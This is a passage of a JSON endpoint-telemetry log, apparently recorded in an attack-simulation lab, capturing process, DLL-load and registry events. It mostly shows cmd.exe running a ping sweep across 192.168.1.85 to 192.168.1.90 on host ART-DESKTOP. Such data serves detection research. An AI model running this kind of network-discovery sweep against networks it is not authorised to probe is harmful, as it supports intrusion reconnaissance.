"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": 
"{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "process", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572391990000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.85", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2900, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572392150000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": 
"{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883572396050000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - 
"timestamp": 131883572396200016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883572396200016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883572396200016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "process", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572396830000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.86", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4696, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572397060000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": 
"ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4696, - "process_name": "PING.EXE", - 
"process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572397140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572397140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572397140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_value": "VFUProvider", - "timestamp": 131883572400270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", - "registry_value": "StartTime", - "timestamp": 131883572400270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "process", - "pid": 4696, 
- "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572401830000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.87", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7372, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572401980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572401990000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572401990000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572401990000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572401990000, - "unique_pid": 
"{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572401990000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572402140000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572402140000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572402140000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572402140000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572402140000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": 
"C:\\Windows\\System32\\mswsock.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572402140000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "process", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572406830000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.88", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6788, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { 
- "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 
6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "process", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572411840000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.89", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1748, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": 
"kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1748, - "process_name": "PING.EXE", 
- "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "process", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572416990000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.90", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4832, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572417130000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": 
"C:\\Windows\\System32\\ntdll.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": 